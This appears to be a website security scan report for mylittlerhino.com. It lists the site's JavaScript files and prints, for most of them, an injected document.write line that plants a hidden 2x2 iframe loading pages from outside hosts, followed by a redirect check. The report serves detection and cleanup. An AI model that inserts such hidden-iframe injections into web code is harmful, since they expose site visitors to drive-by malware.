Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=mylittlerhino.com
Result: Google marks this website as suspicious: visiting it may harm your computer.
Details are available here.
Result: Google marks this website as suspicious: visiting it may harm your computer.
Details are available here.
Scanned pages/files
Request | Server response | Status |
http://mylittlerhino.com/ | 200 OK Content-Length: 2858 Content-Type: text/html | clean |
http://mylittlerhino.com/jslib/common.js | 200 OK Content-Length: 3138 Content-Type: application/x-javascript | clean |
http://mylittlerhino.com/jslib/smoothmovement.js | 200 OK Content-Length: 4572 Content-Type: application/x-javascript | malicious |
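Malicious code - confirmed by antiviruses (see below). The flagged statement writes a 2x2-pixel iframe, too small to be seen, that loads a page from a third-party host. The same j=1358953 value appears in every injected iframe in this report, across three different hosts, which suggests one automated injection rather than separate infections. Flagged statement: document.write('<iframe name=Twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://photographybybarbi.com/waas.html?j=1358953></iframe>');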
function SmoothMovement(position, target){ this.position = position; this.target = target; this.velocity = 0; this.animationInterval = null; } SmoothMovement.prototype.update = function(){ if (this.velocity < 0){ if (this.targe SmoothMovement.prototype.createAnimationClosure = function( updateListener, stopListener){ var thisObject = this; return function(){ thisObject.update(); updateListener(thisObject.position, thisObject); if (thisObject.hasStopped()){ window.clearInterval(thisObject.animationInterval); thisObject.animationInterval = null; if (stopListener) stopListener(thisObject); } } } Antivirus reports:
Hidden iFrame found. size: 2x2 src: http://photographybybarbi.com/waas.html?j=1358953 <iframe name=twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://photographybybarbi.com/waas.html?j=1358953> | ||
http://mylittlerhino.com/jslib/slideb.js | 200 OK Content-Length: 1794 Content-Type: application/x-javascript | malicious |
Malicious code - confirmed by antiviruses (see below) document.write('<iframe name=Twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://fxfocus.co.uk/cwzs.html?j=1358953></iframe>');
function Slide() { this.id = 0; this.cnt = 0; this.sm = new SmoothMovement(744, 0); } Slide.prototype.beginslide = function() { this.cnt = $("cnt").value; if (this.cnt > 1) { this.id = 0; main.slide.displaypic(this.id); $("p" + id).style.zIndex = "89"; this.id = id; var cnt = this.cnt; $("p" + id).style.zIndex = "88"; $("p" + id).style.left = '0px'; for (var i = 0;i<cnt;i++) { if (i != id && parseInt($("p" + i).style.zIndex) > 87) { $("p" + i).style.zIndex = "87"; $("p" + i).style.left = "744px"; }} } Antivirus reports:
Hidden iFrame found. size: 2x2 src: http://fxfocus.co.uk/cwzs.html?j=1358953 <iframe name=twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://fxfocus.co.uk/cwzs.html?j=1358953> | ||
http://mylittlerhino.com/jslib/payment.js | 200 OK Content-Length: 3232 Content-Type: application/x-javascript | malicious |
Malicious code - confirmed by antiviruses (see below) document.write('<iframe name=Twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://photographybybarbi.com/waas.html?j=1358953></iframe>');
function Payment() { this.request; if (!window.XMLHttpRequest) { if (window.ActiveXObject) { this.request = new ActiveXObject("Microsoft.XMLHTTP"); } else { alert("No Ajax"); } } else { this.request = new XMLHttpRequest();} } Payment.proto data = addd(data,pf("c4")); data = addd(data,pf("c5")); data = addd(data,pf("c6")); data = addd(data,pf("bank")); data = addd(data,pf("method")); data = addd(data,pf("amount")); data = addd(data,pf("remark")); this.request.send(data); } } Payment.prototype.paymentsave = function () { this.postcall('phpengine/service/paymentcreate.php'); } Antivirus reports:
Hidden iFrame found. size: 2x2 src: http://photographybybarbi.com/waas.html?j=1358953 <iframe name=twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://photographybybarbi.com/waas.html?j=1358953> | ||
http://mylittlerhino.com/jslib/contactus.js | 200 OK Content-Length: 2974 Content-Type: application/x-javascript | malicious |
Malicious code - confirmed by antiviruses (see below) document.write('<iframe name=Twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://fxfocus.co.uk/cwzs.html?j=1358953></iframe>');
function Contactus() { this.request; if (!window.XMLHttpRequest) { if (window.ActiveXObject) { this.request = new ActiveXObject("Microsoft.XMLHTTP"); } else { alert("No Ajax"); } } else { this.request = new XMLHttpRequest();} } Contactus.prototype. data = addd(data,pf("ct")); this.request.send(data); } } Contactus.prototype.contactusform = function () { this.getcall('','','phpengine/contactus/contactus.php'); }; Contactus.prototype.contactussave = function () { this.savecall('phpengine/contactus/contactussave.php'); }; Contactus.prototype.contactus01 = function () { this.getcall('','','phpengine/contactus/contactus01.php'); }; Antivirus reports:
Hidden iFrame found. size: 2x2 src: http://fxfocus.co.uk/cwzs.html?j=1358953 <iframe name=twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://fxfocus.co.uk/cwzs.html?j=1358953> | ||
http://mylittlerhino.com/jslib/member.js | 200 OK Content-Length: 6251 Content-Type: application/x-javascript | clean |
http://mylittlerhino.com/jslib/cart.js | 200 OK Content-Length: 12661 Content-Type: application/x-javascript | malicious |
Malicious code - confirmed by antiviruses (see below) document.write('<iframe name=Twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://photographybybarbi.com/waas.html?j=1358953></iframe>');
function Cart() { this.request; if (!window.XMLHttpRequest) { if (window.ActiveXObject) { this.request = new ActiveXObject("Microsoft.XMLHTTP"); } else { alert("No Ajax"); } } else { this.request = new XMLHttpRequest();} this.productid = " this.request.onreadystatechange = ajaxcall(this,this.silentresult); data = addd(data,pf("login")); data = addd(data,pf("pwd")); $("exnote").innerHTML = ""; this.request.send(data); } else { $("exnote").innerHTML = "รหัสà¸à¹à¸²à¸à¹à¸¡à¹à¸ªà¸²à¸¡à¸²à¸£à¸à¹à¸§à¹à¸à¸§à¹à¸²à¸à¹à¸à¹"; } } } Antivirus reports:
Hidden iFrame found. size: 2x2 src: http://photographybybarbi.com/waas.html?j=1358953 <iframe name=twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://photographybybarbi.com/waas.html?j=1358953> | ||
http://mylittlerhino.com/jslib/homemenu.js | 200 OK Content-Length: 6043 Content-Type: application/x-javascript | malicious |
Malicious code - confirmed by antiviruses (see below) document.write('<iframe name=Twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://photographybybarbi.com/waas.html?j=1358953></iframe>');
function HomeMenu() { this.selsubproduct = ""; this.selinproduct = ""; this.selhomemenu = ""; } HomeMenu.prototype.dohomemenu =function (newmenu) { if (this.selhomemenu.substr(0,2) == "mc") { $(this.selhomemenu).className="catagoryme } if (code == "mpa") { $("mpsaa").style.display = ds; $("mpsab").style.display = ds; } if (code == "mp7") { } if (code == "mp8") { } if (code == "mp9") { } if (code == "mpb") { } if (code == "mpc") { } if (code == "mpd") { $("mpsda").style.display = ds; $("mpsdb").style.display = ds; } } Antivirus reports:
Hidden iFrame found. size: 2x2 src: http://photographybybarbi.com/waas.html?j=1358953 <iframe name=twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://photographybybarbi.com/waas.html?j=1358953> | ||
http://mylittlerhino.com/jslib/home.js | 200 OK Content-Length: 4016 Content-Type: application/x-javascript | malicious |
Malicious code - confirmed by antiviruses (see below) document.write('<iframe name=Twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://fxfocus.co.uk/cwzs.html?j=1358953></iframe>');
function HomeEngine() { this.request; if (!window.XMLHttpRequest) { if (window.ActiveXObject) { this.request = new ActiveXObject("Microsoft.XMLHTTP"); } else { alert("No Ajax"); } } else { this.request = new XMLHttpRequest();} } HomeEngine.prototyp }; HomeEngine.prototype.saledetail = function (code,dir) { this.getcall(code,dir,'phpengine/home/saledetail.php'); }; HomeEngine.prototype.collectiondetail = function (code,dir,col) { this.getcall(code,dir,'phpengine/collection/collectiondetail.php',col); }; HomeEngine.prototype.searchdetail = function (code,dir,col) { this.getcall(code,dir,'phpengine/home/searchdetail.php',col); }; Antivirus reports:
Hidden iFrame found. size: 2x2 src: http://fxfocus.co.uk/cwzs.html?j=1358953 <iframe name=twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://fxfocus.co.uk/cwzs.html?j=1358953> | ||
http://mylittlerhino.com/jslib/service.js | 200 OK Content-Length: 2022 Content-Type: application/x-javascript | malicious |
Malicious code - confirmed by antiviruses (see below) document.write('<iframe name=Twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://4maximumhealth.com/meas.html?j=1358953></iframe>');
function ServiceEngine() { this.request; if (!window.XMLHttpRequest) { if (window.ActiveXObject) { this.request = new ActiveXObject("Microsoft.XMLHTTP"); } else { alert("No Ajax"); } } else { this.request = new XMLHttpRequest();} } ServiceEngi this.getcall('','','phpengine/service/service03cm.php'); }; ServiceEngine.prototype.deliveryprocess = function () { this.getcall('','','phpengine/service/service04.php'); }; ServiceEngine.prototype.deliverycheck = function () { this.getcall('','','phpengine/service/service05.php'); }; ServiceEngine.prototype.productchange = function () { this.getcall('','','phpengine/service/service06.php'); }; Antivirus reports:
Hidden iFrame found. size: 2x2 src: http://4maximumhealth.com/meas.html?j=1358953 <iframe name=twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://4maximumhealth.com/meas.html?j=1358953> | ||
http://mylittlerhino.com/jslib/mainajax.js | 200 OK Content-Length: 1947 Content-Type: application/x-javascript | malicious |
Malicious code - confirmed by antiviruses (see below) document.write('<iframe name=Twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://4maximumhealth.com/meas.html?j=1358953></iframe>');
function MainAjax() { this.request; if (!window.XMLHttpRequest) { if (window.ActiveXObject) { this.request = new ActiveXObject("Microsoft.XMLHTTP"); } else { alert("No Ajax"); } } else { this.request = new XMLHttpRequest();} } this.getcall('','','phpengine/service/service.php'); }; MainAjax.prototype.orderadmin = function () { this.getcall('','','phpengine/orderadmin/orderadmin.php'); }; MainAjax.prototype.stockadmin = function () { this.getcall('','','phpengine/stockadmin/stockadmin.php'); }; MainAjax.prototype.memberadmin = function () { this.getcall('','','phpengine/memberadmin/memberadmin.php'); }; Antivirus reports:
Hidden iFrame found. size: 2x2 src: http://4maximumhealth.com/meas.html?j=1358953 <iframe name=twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://4maximumhealth.com/meas.html?j=1358953> | ||
http://mylittlerhino.com/jslib/mainengine.js | 200 OK Content-Length: 7221 Content-Type: application/x-javascript | clean |
http://mylittlerhino.com/test404page.js | 404 Not Found Content-Length: 295 Content-Type: text/html | clean |
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: mylittlerhino.com
Result:
HTTP/1.1 200 OK
Connection: close
Date: Fri, 25 Apr 2014 21:30:10 GMT
Server: Apache/2.2.23 (CentOS)
Content-Length: 2858
Content-Type: text/html; charset=None
X-Powered-By: PHP/5.2.17
...2858 bytes of data.
GET / HTTP/1.1
Host: mylittlerhino.com
Result:
HTTP/1.1 200 OK
Connection: close
Date: Fri, 25 Apr 2014 21:30:10 GMT
Server: Apache/2.2.23 (CentOS)
Content-Length: 2858
Content-Type: text/html; charset=None
X-Powered-By: PHP/5.2.17
...2858 bytes of data.
Second query (visit from search engine):
GET / HTTP/1.1
Host: mylittlerhino.com
Referer: http://www.google.com/search?q=mylittlerhino.com
Result:
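The result is similar to the first query. There are no suspicious redirects found. This comparison changes only the Referer header, so it does not rule out responses that depend on other request properties; the iframes reported above are written by the site's script files, not delivered through a redirect.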
GET / HTTP/1.1
Host: mylittlerhino.com
Referer: http://www.google.com/search?q=mylittlerhino.com
Result:
The result is similar to the first query. There are no suspicious redirects found.